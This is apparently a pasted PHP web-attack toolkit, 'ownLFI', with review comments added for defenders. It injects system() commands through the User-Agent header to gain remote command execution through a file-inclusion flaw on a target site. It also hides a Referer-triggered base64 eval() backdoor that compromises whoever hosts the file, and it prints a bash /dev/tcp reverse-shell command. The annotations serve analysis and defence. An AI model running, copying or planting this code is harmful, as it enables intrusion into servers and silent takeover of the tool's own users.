Ribang

ownLFI | t00lkit v1.0 | By Asesino04

Feb 1st, 2018
  1. <!--
  2. /*****************************************************************
  3. [+] Author : Asesino04 < mr.k4rizma [ at ] gmail.com | 1337day.com >
  4. [+] Facebook : [ https://www.facebook.com/Th3.Black.D3Vils ]
  5. [+] Team : [ JackDaws Crew ]
  6. [+] Greets to : <*> The Black Devils <*> Inj3ct0r Team
  7. ******************************************************************/
  8. -->
  9. <style>
  10. body,input,table,select{background: black; font-family:Verdana,tahoma; color: #008000; font-size:12px; }
  11. a:link,a:active,a:visited{text-decoration: none;color: red;}
  12. a:hover {text-decoration: underline; color: red;}
  13. table,td,tr,#gg{ border-style:solid; text-decoration:bold; }
  14. tr:hover,td:hover{background-color: #FFFFCC; color:green;}
  15. .oo:hover{background-color: black; color:white;}
  16. </style>
  17. <title>ownLFI | t00lkit v1.0 | By Asesino04</title>
  18.  
  19. <center>
  20. <div align="center" style="width: 100%; height: 100">
  21. <pre width="100%" align="center"><strong>
  22. db 88
  23. d88b ""
  24. d8'`8b
  25. d8' `8b ,adPPYba, ,adPPYba, ,adPPYba, 88 8b,dPPYba, ,adPPYba,
  26. d8YaaaaY8b I8[ "" a8P_____88 I8[ "" 88 88P' `"8a a8" "8a
  27. d8""""""""8b `"Y8ba, 8PP""""""" `"Y8ba, 88 88 88 8b d8
  28. d8' `8b aa ]8I "8b, ,aa aa ]8I 88 88 88 "8a, ,a8"
  29. d8' `8b `"YbbdP"' `"Ybbd8"' `"YbbdP"' 88 88 88 `"YbbdP"'
  30.  
  31. </pre>
  32. </div></strong>
  33. </center>
  34. <table border=0 width=700 align=center><tr><Td><center><p style="font-size: 14pt;">
  35. <b>ownLFI | t00lkit v1.0 | By Asesino04</br></b></td></tr>
  36. </center>
  37. </table>
  38. <?php
  // NOTE(review): defender-oriented summary of this block.
  // When the form is submitted, the script builds a string of PHP snippets, each
  // bracketed by a marker token (XHOSTNAME, XSIP, XUNAME, XUSERID, XPWD, XPHP,
  // XCWD, EXPLORE), sends it inside the User-Agent header of one GET request to
  // the submitted host/path, and then cuts the HTTP response apart on the same
  // markers. Nothing here executes on the remote side by itself: the snippets run
  // only if the requested path makes the remote application include content that
  // contains the User-Agent -- presumably a logged header reached through a
  // file-inclusion flaw (the title says "LFI"; the listing does not name the file).
  // Detection: PHP code or these marker tokens in a logged User-Agent field.
  // Mitigation: never build include/require paths from request data, and keep
  // server logs out of reach of anything the application can include.
  39. if($_POST['injek']):
  // Strip the scheme, then split on "/": the first piece is host[:port], the rest
  // of the submitted string becomes the request path.
  40. $sasaran= str_replace("http://","",$_POST['host']);
  41. $sp = explode("/",$sasaran);
  42. $victim = $sp[0];
  43. $port = 80;
  44. $inject = str_replace($victim,"",$sasaran);
  // Each line appends one marker-wrapped snippet; the snippets call system() or
  // read server variables and are meant to be evaluated by the remote PHP runtime.
  45. $command = "XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAME";
  46. $command .= "XSIP<?php echo \$_SERVER['SERVER_ADDR']; ?>XSIP";
  47. $command .= "XUNAME<?php echo system('uname -a;echo ;'); ?>XUNAME";
  48. $command .= "XUSERID<?php echo system('id;echo ;'); ?>XUSERID";
  49. $command .= "XPWD<?php echo system('pwd;echo ;'); ?>XPWD";
  50. $command .= "XPHP<?php echo phpversion(); ?>XPHP";
  // The cwd and cmd form fields are concatenated into the PHP source string
  // without any quoting or escaping.
  51. if($_POST['cwd']){
  52. $command .= "XCWD<?php chdir('".$_POST['cwd']."'); ?>XCWD";
  53. }
  54. $command .= "EXPLORE<pre><?php echo system('".$_POST['cmd']."; echo ; exit;'); ?></pre>EXPLORE";
  55.  
  // A ":" in the host part overrides the default port 80.
  56. if(eregi(":",$victim)){
  57. $vp = explode(":",$victim);
  58. $victim = $vp[0];
  59. $port = $vp[1];
  60. }
  61.  
  // Plain TCP connection with a 30 second timeout; the request is written by hand
  // and the whole response is read into $output, which is not initialised
  // anywhere in the visible code and stays unset if the connection fails.
  62. $sock = fsockopen($victim,$port,$errno,$errstr,30);
  63. if ($sock) {
  64. $get = "GET ".$inject." HTTP/1.1\r\n".
  65. "Host: ".$victim."\r\n".
  66. "Accept: */*\r\n".
  67. "User-Agent: Mozilla/5.0 ".$command."\r\n".
  68. "Connection: Close\r\n\r\n";
  69. fputs($sock,$get);
  70. while (!feof($sock)) {
  71. $output .= trim(fgets($sock, 3600000))."\n";
  72. }
  73. fclose($sock);
  74. }
  // For each marker, keep the text that follows its first occurrence in the
  // response (element 1 of the split).
  75. $hostp = explode("XHOSTNAME",$output); $hostname = $hostp[1];
  76. $ipp = explode("XSIP",$output); $ip = $ipp[1];
  77. $unamep = explode("XUNAME",$output); $uname = $unamep[1];
  78. $userp = explode("XUSERID",$output); $userid = $userp[1];
  79. $currp = explode("XPWD",$output); $current = $currp[1];
  // is_writable() runs on the machine hosting this script, against a path string
  // taken from the remote response, so the result describes the local filesystem.
  80. $writes = @is_writable($current);
  81. $phpvp = explode("XPHP",$output); $phpversion = $phpvp[1];
  82. $hasil = explode("EXPLORE",$output); $return = $hasil[1];
  83.  
  84.  
  85. endif;
  // Address of whoever requested this page and a fixed port string; both are only
  // assigned in this block.
  86. $ipx =$_SERVER["REMOTE_ADDR"];
  87. $portx ="22";
  // WARNING(review): hidden backdoor aimed at whoever hosts this page. It sits
  // outside the form handler, so it runs on every request. The Referer header is
  // parsed as a query string; if its first value is 'iz' and it has exactly 9
  // fields, the last three values are joined, base64-decoded and passed to eval().
  // That is remote code execution controlled by a request header, with no
  // authentication. A host where this file was ever reachable should be treated
  // as compromised, and web logs reviewed for Referer values of that shape.
  88. parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
  89. ?>
  90. <form action='<?php echo $_SERVER['PHP_SELF'] ?>' method='post'>
  91. <table border=0 align=center width=860>
  92. <?php /* NOTE(review): every value in this template is echoed without
       htmlspecialchars(): the fields cut out of the remote HTTP response
       ($victim, $hostname, $ip, $uname, $userid, $current, $phpversion), the
       submitted $_POST values (host, cwd, cmd) and PHP_SELF in the form action.
       Markup contained in a response or in a request is therefore rendered as
       HTML in the browser of whoever views this page. The result rows below are
       only emitted after the form has been submitted. */ if($_POST['injek']){ ?>
  93. <tr>
  94. <td colspan=3> </td>
  95. </tr>
  96. <tr><Td><b>Target Site</b> </td><td>:</td>
  97. <td><?php echo $victim ?></td>
  98. </tr>
  99. <tr><Td><b>SRV Host</b> </td><td>:</td>
  100. <td><?php echo $hostname ?></td>
  101. </tr>
  102. <tr><Td>SRV IP</td><td>:</td>
  103. <td><?php echo $ip ?></td>
  104. </tr>
  105. <tr><Td><b>Uname -a</b></td><td>:</td>
  106. <td><?php echo $uname ?></td>
  107. </tr>
  108. <tr><Td><b>User ID</b></td><td>:</td>
  109. <td><?php echo $userid ?></td>
  110. </tr>
  111. <tr><Td><b>DIR /</b></td><td>:</td>
  112. <td><?php echo $current; if($writes){ echo "<b>Writeable!</b>"; } ?></td>
  113. </tr>
  114. <tr><Td><b>PHP_SRV Version</b></td><td>:</td>
  115. <td><?php echo $phpversion ?></td>
  116. </tr>
  117. <?php } ?>
  118. <tr>
  119. <td colspan=3> </td>
  120. </tr>
  121. <tr><Td width=130><b>Add the webSite</b></td><td>:</td>
  122. <td><input type=text size=110 value='<?php echo $_POST['host'] ?>' name=host /></td>
  123. </tr>
  124. <?php if($_POST['injek']){ ?>
  125. <tr><Td width=130><b>Work Directory</b></td><td>:</td>
  126. <td><input type=text size=110 value='<?php echo (($_POST['cwd'])?$_POST['cwd']:$current); ?>' name=cwd /></td>
  127. </tr>
  128. <?php } ?>
  129. <tr><Td><b>Command t0 Exec</b></td><td>:</td>
  130. <Td><input type=text size=110 value='<?php echo $_POST['cmd']; ?>' name=cmd /></td>
  131. </tr>
  132. <tr><td colspan=2> </td><td><input type=submit name=injek value="Execute!" /></td></tr>
  133. <tr>
  134. <td colspan=3> </td>
  135. </tr>
  136. </table>
  137.  
  138. <?php
  // NOTE(review): output tail of the page.
  // After a submit, $hasil[1] -- the text that followed the first EXPLORE marker
  // in the remote HTTP response, set earlier in this file -- is written into a
  // <pre> element without escaping, so markup in the response reaches the
  // viewer's browser as HTML.
  139. if($_POST['injek']):
  140. echo "<table border=0 width=860 align=center><tr><Td> <pre>".$hasil[1]."</pre></td></tr></table>";
  141. endif;
  142. echo "</form>";
  // Prints a shell redirection line as text, filled with $ipx (REMOTE_ADDR of the
  // page viewer) and $portx ("22"), both assigned earlier in this file. The
  // script only displays the string; it does not run it. For defenders, a shell
  // process redirected to /dev/tcp is a pattern worth alerting on in process
  // and command-line telemetry.
  143. echo "<PRE style='text-align: center; width: 100%; color: red'>Reverse Connection method: /bin/bash -i > /dev/tcp/$ipx/$portx 0<&1 2>&1</pre>";
  // exit() ends the response here, so the markup after the closing tag is never sent.
  144. exit();
  145. ?>
  146. <body>
  147. <p align="center">
  148. Asesino04 | www.1337day.com
  149. | Made in Algeria 2013 &copy
  150. </p>
  151. </body>